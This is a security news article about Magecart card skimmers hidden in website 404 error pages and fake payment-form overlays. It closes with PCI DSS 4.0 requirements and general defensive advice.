How Cybercriminals Exploit 404 Pages to Steal Sensitive Information

The Evolving Tactics of Cybercriminal Groups Behind Magecart Attacks

An Unseen Technique to Hide Credit Card Skimming Code

Recently, the notorious cybercriminal groups responsible for the Magecart payment-card theft campaigns have employed a new technique to conceal their credit card skimming code. This technique has allowed them to evade detection for several weeks while infecting major e-commerce sites, including well-known brands in the food and retail industries. The technique involves hiding JavaScript code in a comment within a targeted site’s 404 default page. Alongside this, other pages on the site have been subtly modified to include a call to a nonexistent folder, triggering a 404 error, and retrieving the malicious page.

Security researchers at Akamai, a content delivery network and cybersecurity company, have highlighted the sophistication and novelty of this concealment technique. It manipulates the default 404 error page of a targeted website, providing Magecart actors with numerous creative options for improved hiding and evasion. Roman Lvovsky, a security researcher at Akamai, explained that this technique allows the attacker’s script to retrieve the entire attack code contained within a specific placeholder in the comment.

Magecart Attacks and Their Tactics

Magecart attacks encompass a range of post-exploitation techniques used to skim credit card information and other user data from websites. These techniques involve obfuscated JavaScript, hijacking of forms, and malicious redirects. The complexity of modern websites, which heavily rely on third-party components, open-source Web frameworks, and code obfuscation, often allows embedded code to remain undetected. Cybercriminal groups can hide their malicious content by inserting it among other obfuscated code or compromising a third-party source of code or content.

In the case of the recent Magecart campaign titled “Silent Skimmer,” a Chinese-speaking threat group compromised web-facing applications to skim credit card numbers in the Asia-Pacific region, and later expanded their activities to North and Latin America. The payload of this campaign overlays a fake credit card form on top of the original form, tricking users into submitting their financial details.

Code Obfuscation and Overlays in Magecart Campaigns

The modification of default 404 pages is just one aspect of the Magecart campaign’s efforts to deliver their payload and maintain persistence. By using fake form overlays and redirect techniques, they are able to collect credit card details from targeted users. When a user submits data into the attacker’s fake form, an error is presented, the fake form is hidden, the original payment form is displayed, and the user is prompted to re-enter their payment details. Notably, the submission of the fake form triggers a network request to the attacker’s command-and-control server, carrying all the stolen personal and credit card information.

A 404 page is considered a first-party object, residing on the same server as the home page and not a third-party service. This allows attackers to bypass certain security measures, such as Content Security Policy (CSP) headers. However, this technique, while making it difficult to discover modifications, is not necessarily stealthy. It can be considered noisy since it involves a call to a nonexistent resource, which Magecart groups typically aim to avoid to reduce the chances of attracting unwanted attention.

Addressing the Magecart Problem Through PCI DSS

The Payment Card Industry (PCI) Security Standards Council has been striving to combat Magecart attacks through the latest version of its Data Security Standard (DSS). The updated DSS includes two enhanced security requirements aimed at protecting payment pages. Requirement 6 focuses on developing and maintaining secure systems and software to prevent unauthorized code injection, while Requirement 11 emphasizes regular testing of systems and networks to detect any changes.

The implementation of these requirements is particularly critical for online merchants, even those that outsource the storage, processing, and transmission of account data to payment service providers. Jeff Zitomer, a senior director at Human Security, a bot- and fraud-protection service, highlights the challenges posed by modern websites that source code from various external parties at runtime. This dynamic nature of sourcing code bypasses traditional security controls and provides attackers with the opportunity to exploit vulnerabilities through malicious script attacks. It is worth noting that while the current PCI-DSS 4.0 requirements are considered best practices, they will become mandatory in early 2025.

The Imperative for Robust Website Security

The recent Magecart attack technique highlights the need for robust website security measures. Traditional scanning tools often overlook code hidden within default 404 pages, as these pages were not typically targeted for inspection. Cybersecurity researchers emphasize the importance of incorporating comprehensive scanning techniques that can detect and analyze all aspects of a website’s code, including comments and error pages.

Furthermore, organizations must adopt the latest security standards and best practices, such as the PCI DSS 4.0, to protect sensitive user data. Implementing secure development and maintenance practices, regularly monitoring systems and networks, and ensuring the integrity of third-party code are essential steps in minimizing the risk of Magecart attacks and similar threats.

Ultimately, it is crucial for both businesses and individuals to prioritize cybersecurity and remain vigilant against evolving cybercrime tactics. Regularly updating systems, utilizing strong and unique passwords, employing multi-factor authentication, and being cautious of suspicious links and attachments are fundamental actions to mitigate risks. Additionally, staying informed about the latest security threats and seeking expert advice can help individuals and organizations better protect themselves in an increasingly interconnected and digital world.